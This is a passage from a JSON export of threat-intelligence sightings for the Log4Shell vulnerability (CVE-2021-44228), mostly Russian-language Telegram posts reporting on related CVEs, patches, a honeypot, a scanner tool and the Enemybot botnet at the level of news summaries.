\u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u0430\u0442\u0447 \u0434\u043b\u044f \u043a\u0440\u043e\u0441\u0441\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043e \u0447\u0435\u043c \u0442\u0430\u043a\u0436\u0435 \u043e\u0437\u0430\u0431\u043e\u0442\u0438\u043b\u043e\u0441\u044c CISA, \u0441\u043f\u0435\u0448\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u043d\u043e\u0432\u044b\u0435 \u0431\u0430\u0433\u0438 \u0432 \u0441\u0432\u043e\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 CVE.", "creation_timestamp": "2021-12-28T16:00:47.000000Z"}, {"uuid": "a773eed7-e5ba-4e58-b8ea-fd37befb3e5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/QbzltGTL5MLooH2kEl1qS06h23oJX4UpKYkbnKcssYleTA", "content": "", "creation_timestamp": "2022-01-03T05:49:38.000000Z"}, {"uuid": "f273315c-427f-4dfe-aee1-36c9a8018bbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/true_secator/2677", "content": "NHS Digital \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e\u0431 RCE \u0432 Windows-\u043a\u043b\u0438\u0435\u043d\u0442\u0435 \u0434\u043b\u044f \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 Okta Advanced Server Access.\n\n\u0420\u0435\u0448\u0435\u043d\u0438\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c Zero Trust \u0434\u043b\u044f \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0439 \u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b, \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0442\u044b\u0441\u044f\u0447\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 CVE-2022-24295 \u0438 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u0430 \u0432\u0441\u0435\u043c \u0432\u0435\u0440\u0441\u0438\u044f\u043c \u041f\u041e \u0434\u043e 1.57.0 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e. \u0423\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a, \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0438\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438, \u043c\u043e\u0436\u0435\u0442 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 URL-\u0430\u0434\u0440\u0435\u0441.\n\n\u0423\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0443 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. \u041f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u043e\u0448\u0438\u0431\u043a\u0438, \u043f\u044b\u0442\u0430\u044f\u0441\u044c \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u0435\u0435 \u0437\u043b\u043e\u043d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\nNHS Digital \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043f\u043e\u0441\u043a\u043e\u0440\u0435\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043e\u0431\u0445\u043e\u0434\u043d\u044b\u0445 \u043f\u0443\u0442\u0435\u0439 \u0434\u043b\u044f \u0432\u043d\u043e\u0432\u044c \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0432\u043d\u043e\u0432\u044c \u0432\u044b\u0448\u0435\u0434\u0448\u0438\u0439 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044c NHS Digital \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439\u00a0Log4Shell (CVE-2021-45105, CVE-2021-45046 \u0438 CVE-2021-44228) \u0432 Okta.", "creation_timestamp": "2022-02-28T15:06:00.000000Z"}, {"uuid": "ca241a59-f636-4a1a-95d9-88e0578ac8c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/true_secator/2489", "content": "log4j-honeypot-flask\n\nInternal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228\n\nhttps://github.com/BinaryDefense/log4j-honeypot-flask\n\n#honeypot #log4j", "creation_timestamp": "2021-12-29T12:10:27.000000Z"}, {"uuid": "14cf0a10-d9ea-4b22-965d-002b75ba0b7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/NeKaspersky/2117", "content": "\u041d\u043e\u0432\u044b\u0439 \u0431\u043e\u0442\u043d\u0435\u0442 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0432\u0435\u0440\u0431\u0443\u0435\u0442 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u044b \u0438 IoT-\u0434\u0435\u0432\u0430\u0439\u0441\u044b \u0432 \u0441\u0432\u043e\u0438 \u0440\u044f\u0434\u044b\n\n\u0410\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0438 \u0443\u0433\u0440\u043e\u0437 \u0438\u0437 Fortinet \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u00ab\u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435\u00bb, \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0435\u0435 \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043e\u0442\u0447\u0435\u0442 \u043e \u0435\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u0435.  \u041f\u043e \u0438\u0445 \u0441\u043b\u043e\u0432\u0430\u043c, Enemybot \u043f\u043e\u0441\u0442\u0440\u043e\u0435\u043d \u043d\u0430 \u0431\u0430\u0437\u0435 Mirai \u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u0437\u0430 \u0441\u0447\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445 \u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0412\u0435\u0449\u0435\u0439.  \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u0441\u0442\u043e\u044f\u0449\u0438\u0435 \u0437\u0430 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u043c, \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043d\u0430 \u043a\u0440\u0438\u043f\u0442\u043e-\u043c\u0430\u0439\u043d\u0438\u043d\u0433\u0435 \u0438 DDoS-\u0430\u0442\u0430\u043a\u0430\u0445 \u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0431\u043e\u0442\u043e\u0432 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u044f \u0441\u0432\u043e\u0438\u0445 \u0446\u0435\u043b\u0435\u0439.\n\nEnemybot \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044e \u0441\u0442\u0440\u043e\u043a, \u0432 \u0442\u043e \u0432\u0440\u0435\u043c\u044f \u043a\u0430\u043a \u0435\u0433\u043e C2 \u043f\u0440\u044f\u0447\u0435\u0442\u0441\u044f \u0432 \u0441\u0435\u0442\u0438 Tor, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0431\u0435\u0437\u0433\u043b\u0430\u0432\u0438\u0442\u044c \u0431\u043e\u0442\u043d\u0435\u0442 \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u0442\u0438\u0447\u043d\u043e.  \u0421\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0433\u043e \u0434\u0435\u0432\u0430\u0439\u0441\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0441 C2 \u0438 \u043e\u0436\u0438\u0434\u0430\u0435\u0442 \u043f\u043e\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434. \u0411\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043d\u0438\u0445 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 DDoS-\u0430\u0442\u0430\u043a\u0430\u043c\u0438, \u043d\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 \u044d\u0442\u0438\u043c \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f. \u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u043a\u043e\u0441\u044f\u0447\u043d\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043a\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a\u0438 Enemybot, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0432\u044b\u044f\u0432\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440: \u043d\u0430 \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 Enemybot \u0441\u043e\u0431\u0440\u0430\u043d \u043f\u043e\u0434 x86, x64, i686, darwin, bsd, arm \u0438 arm64, ppc, m68k \u0438 spc.\n\n\u0427\u0442\u043e \u043a\u0430\u0441\u0430\u0435\u0442\u0441\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, Fortinet \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0438, \u0447\u0442\u043e 3 CVE \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432\u0441\u0435\u043c\u0438 \u0441\u0431\u043e\u0440\u043a\u0430\u043c\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430:\n\u2022 CVE-2020-17456: RCE \u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 Seowon Intech SLC-130 \u0438 SLR-120S (CVSS 9.8).\n\u2022 CVE-2018-10823: RCE \u0432 D-Link DWR (CVSS 8.8).\n\u2022 CVE-2022-27226: \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0439 cronjob (\u043e\u0434\u0438\u043d \u0438\u0437 \u043d\u0438\u043a\u0441\u043e\u0432\u044b\u0445 \u0434\u0435\u043c\u043e\u043d\u043e\u0432 \u0430\u0432\u0442\u043e\u0441\u0442\u0430\u0440\u0442\u0430) \u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 iRZ (CVSS 8.8).\n\n\u0414\u0440\u0443\u0433\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u043b\u0438\u0448\u044c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0432\u0435\u0440\u0441\u0438\u044f\u043c\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430: CVE-2022-25075-25084 \u0432 TOTOLINK, CVE-2021-44228/2021-45046 (Log4Shell), CVE-2021-41773/CVE-2021-42013 \u0432 HTTP-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Apache, CVE-2018-20062 \u0432 ThinkPHP CMS, CVE-2017-18368 \u0432 Zyxel P660HN, CVE-2016-6277 \u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 NETGEAR, CVE-2015-2051 \u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 D-Link \u0438\nCVE-2014-9118 \u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 Zhone.\n@NeKaspersky", "creation_timestamp": "2022-04-14T15:17:01.000000Z"}, {"uuid": "4bfa31ee-f268-43ef-aacd-eab5a5095753", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/crackcodes/2060", "content": "#tools\n#Blue_Team_Techniques\n1. HTML Smuggling Detection - HTML Smuggling Detection\nhttps://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841\n2. Log4Shell-Scanner-Exploit - Bash script to identify the Log4j CVE-2021-44228 vulnerability remotely\nhttps://github.com/julian911015/Log4j-Scanner-Exploit", "creation_timestamp": "2023-01-02T19:24:07.000000Z"}, {"uuid": "79d5276b-7540-45a1-bdec-f923cb6895ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/reconshell/1124", "content": "Apache Log4j2 vulnerability Patch\n\n#vulnerability #Apache #Log4j2 #RCE #0day #0-Day\n#Log4jPatch #CVE-2021-44228 #Hacking #ZeroDay\n\nhttps://reconshell.com/apache-log4j2-vulnerability-patch/", "creation_timestamp": "2021-12-10T13:03:12.000000Z"}, {"uuid": "53ec2fe6-f67d-46d7-934c-27a2f9cbb712", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/NeKaspersky/1587", "content": "\u041a\u0442\u043e \u0442\u0443\u0442 \u0441\u0430\u043c\u044b\u0439 \u0441\u0438\u043b\u044c\u043d\u044b\u0439 \u0438 \u043a\u0440\u0443\u0442\u043e\u0439? \u0421\u0430\u043c\u0430\u044f \u0441\u0438\u043b\u044c\u043d\u0430\u044f \u0438 \u043a\u0440\u0443\u0442\u0430\u044f \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c log4j. \n\n\u0412 \u043f\u0440\u043e\u0448\u043b\u044b\u0439 \u0440\u0430\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Log4Shell, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 \u0432 10/10 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3, \u043d\u0430\u0432\u0435\u043b\u0430 \u043c\u043d\u043e\u0433\u043e \u0448\u0443\u043c\u0430. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 2.15 \u0440\u0435\u0448\u0438\u043b\u043e \u0432\u0441\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u043d\u043e \u0442\u0443\u0442 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u043e\u043d\u0430 \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2021-45046), \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u044e\u0449\u0430\u044f\u0441\u044f \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0432\u0441\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u0435\u0440\u0441\u0438\u0438 2.15 \u0438 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0442\u043e\u0433\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043b\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u00ablog4j2.noFormatMsgLookup\u00bb \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b. \n\n\u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (Log4Shell, CVE-2021-44228) \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0433 \u0441\u043f\u043e\u043a\u043e\u0439\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0441\u0432\u043e\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435, \u0430 \u0442\u0435\u043f\u0435\u0440\u044c \u0432\u0441\u0435 \u0435\u0433\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435\u043c \u0443\u0441\u043b\u043e\u0432\u0438\u0439 \u0434\u043b\u044f \u0430\u0432\u0430\u0440\u0438\u0439\u043d\u043e\u0433\u043e \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0438\u0437-\u0437\u0430 \u0438\u0441\u0447\u0435\u0440\u043f\u0430\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432. \n\nCVE-2021-45046  \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c \u043e\u0431\u0445\u043e\u0434 \u0437\u0430\u0449\u0438\u0442\u044b \u0437\u0430 \u0441\u0447\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0443\u0441\u043b\u043e\u0432\u0438\u0439 \u0434\u043b\u044f \u0432\u044b\u0432\u043e\u0434\u0430 \u0432 \u043b\u043e\u0433 \u0434\u0430\u043d\u043d\u044b\u0445. \u0422\u0435, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u043b\u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u044c \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 JNDI, \u043f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0438 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0438\u043b\u0438 MDC-\u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432, \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u044e\u0449\u0438\u0445 \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0444\u043e\u0440\u043c\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u044b\u0432\u043e\u0434\u0430 \u0432 \u043b\u043e\u0433.\n\n\u0418 \u0432\u0441\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0432\u0440\u043e\u0434\u0435 \u043a\u0430\u043a \u0440\u0435\u0448\u0438\u043b\u0438\u0441\u044c \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u0445\u043e\u0434\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f 2.16 \u0438 2.12.2, \u043d\u043e \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u00ab\u043d\u043e\u0432\u0435\u043d\u044c\u043a\u0438\u0439\u00bb. \u0418\u043c\u044f \u0435\u043c\u0443 CVE-2021-45105, \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0434\u0432\u0443\u0445 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c, \u043e\u0442\u043d\u0435\u0441\u043b\u0438 \u043a \u0442\u0430\u043a\u0438\u043c \u0436\u0435 \u043e\u043f\u0430\u0441\u043d\u044b\u043c, \u043d\u043e \u043d\u0435 \u0442\u0430\u043a\u0438\u043c \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u044b\u0437\u044b\u0432\u0430\u043b\u0430 \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 \u0438 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432 \u0432\u0438\u0434\u0435 \u0437\u0430\u0446\u0438\u043a\u043b\u0438\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u0432\u0430\u0440\u0438\u0439\u043d\u043e\u0433\u043e \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u0441\u0442\u0440\u043e\u043a. \u041d\u043e \u0432\u0440\u043e\u0434\u0435 \u043a\u0430\u043a \u0441 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u044b\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c Log4j 2.17, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0438 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0441 Java 8.\n\n\u0411\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432\u0447\u0435\u0440\u0430 Cryptolaemus \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438 \u043e 